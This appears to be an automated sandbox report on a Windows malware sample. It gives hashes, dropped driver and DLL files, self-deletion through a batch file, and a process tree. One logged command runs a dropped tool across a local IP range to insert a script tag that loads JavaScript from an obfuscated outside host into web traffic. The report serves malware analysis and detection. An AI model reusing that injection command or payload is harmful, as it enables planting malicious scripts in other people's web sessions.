Analysis
-
max time kernel
35s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
07-07-2024 08:46
Static task
static1
Behavioral task
behavioral1
Sample
29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe
Resource
win10v2004-20240704-en
General
-
Target
29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe
-
Size
177KB
-
MD5
29dd69cd1ca1e20cad3c239080179f59
-
SHA1
9bd6a3734f43cf2647e9aaadf19d12a4490d8485
-
SHA256
398a3c391d658ec0ac09a7a00ea503eb18721500796d852302e329197db8c902
-
SHA512
c2d76985103c74eed57fa94a3db568c93d0f6960df6e6a0244b3509e11708b9f9cfe945316341f218215965c2fdcc1a290e9dbec388cd3389e26deff02aa0591
-
SSDEEP
3072:2UUZ8OvHqE1DUL94RUEe7ksObr6zKjcVSngYv0smc/IqDvucUihAf/jiddtUhikQ:v2VUTEegVxcAngYv0XqDvucUi2/jKdRZ
Malware Config
Signatures
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\npf.sys 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe -
Deletes itself 1 IoCs
pid Process 2216 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2812 360ubgp.exe -
Loads dropped DLL 8 IoCs
pid Process 2120 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe 2120 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe 2812 360ubgp.exe 2812 360ubgp.exe 2812 360ubgp.exe 2812 360ubgp.exe 2812 360ubgp.exe 2812 360ubgp.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe File created C:\Windows\SysWOW64\WanPacket.dll 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe File created C:\Windows\SysWOW64\wpcap.dll 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe File created C:\Windows\SysWOW64\360ubgp.exe 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe File created C:\Windows\SysWOW64\npptools.dll 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2028 PING.EXE -
Suspicious behavior: LoadsDriver 13 IoCs
pid Process 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2120 wrote to memory of 2812 2120 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe 29 PID 2120 wrote to memory of 2812 2120 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe 29 PID 2120 wrote to memory of 2812 2120 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe 29 PID 2120 wrote to memory of 2812 2120 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe 29 PID 2120 wrote to memory of 2216 2120 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe 31 PID 2120 wrote to memory of 2216 2120 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe 31 PID 2120 wrote to memory of 2216 2120 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe 31 PID 2120 wrote to memory of 2216 2120 29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe 31 PID 2216 wrote to memory of 2028 2216 cmd.exe 33 PID 2216 wrote to memory of 2028 2216 cmd.exe 33 PID 2216 wrote to memory of 2028 2216 cmd.exe 33 PID 2216 wrote to memory of 2028 2216 cmd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\29dd69cd1ca1e20cad3c239080179f59_JaffaCakes118.exe"1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\360ubgp.exe-idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://e%6Dj.P%61ss%69ngG%61s.n%65t/tj.js></script>"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2812
-
-
C:\Windows\SysWOW64\cmd.execmd /c 12.bat2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2028
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ad4f6af1a161e2d7737a9f80a5a8cad4
SHA1a9f4f98439a58e6528023b71d890488e8fb88784
SHA256ef1f5ad7109bf71ca118cff03a4ad4793ac220f821dfaae8493d6c5a38d8142b
SHA5120caeb636e4e6991d978e33efb28c71aedd01f42a71aa8f5944a53c5fd2f991c7b54faa86508e4afd6e0068d1f10d17595601209c543ab0ad1f74aa75ea0df264
-
Filesize
41KB
MD5b15e0180c43d8b5219196d76878cc2dd
SHA133e676b37a3380de32c10ba5bc9170997445d314
SHA256a4a102aab8f91a5b452ae2c9a40f5ebc07bc62af892af57d6e3ad1f4340486ab
SHA51247e0e66e89ad11506aff709e7cd5817f5b68bafd5fbc4cc4f4ba5b82b1845977023c90273c58d580266fc8fdcb7fd230ade9c31a8dcc8b9b6ca146423e848a09
-
Filesize
8.0MB
MD531fc0c163ec197854b1016127631b510
SHA1c419055ae31e32f52d658b1b860828f17df5d3b2
SHA256bf65dd032d9d2554213fe626d732f4c89da5a2440c2af32b28be96292b8160c5
SHA5121c954ac51b0d88d2cb3ab3d1602c47fad6c470dfa1f9f284b1360b094f12c35ce96a7335f17bb023c5c128b625c736c928a8349b3270205407dfbc8c4303a968
-
Filesize
86KB
MD59062aeea8cbfc4f0780bbbefad7cebcb
SHA1c4ad39ec51ad0e84fe58f62931d13cddfde3189e
SHA256b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c
SHA51260957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646
-
Filesize
66KB
MD5fdd104a9fd3427a1df37041fa947a041
SHA1cca1881a3c02033008f78cc39b712b637c7f3e13
SHA256384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a
SHA5129dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7
-
Filesize
53KB
MD5841007a04750a9acb56dd82095300d15
SHA158c1e338bc78a54795a844b559b614004e53d3cb
SHA256a15c409af481494fa8c3d82ec0dc7c67075a706160cc060bec982e40c060d578
SHA512dcaeae21ffc2479fc595632a93e082396caea1eb6c4093e24c199a5ee3dd09248dfb5fe11ea200034e2be928b2db09218d9d763428294347ccd63f4cad4c06de
-
Filesize
234KB
MD5ce842d25e5b7e6ff21a86cad9195fbe8
SHA1d762270be089a89266b012351b52c595e260b59b
SHA2567e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3
SHA51284c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6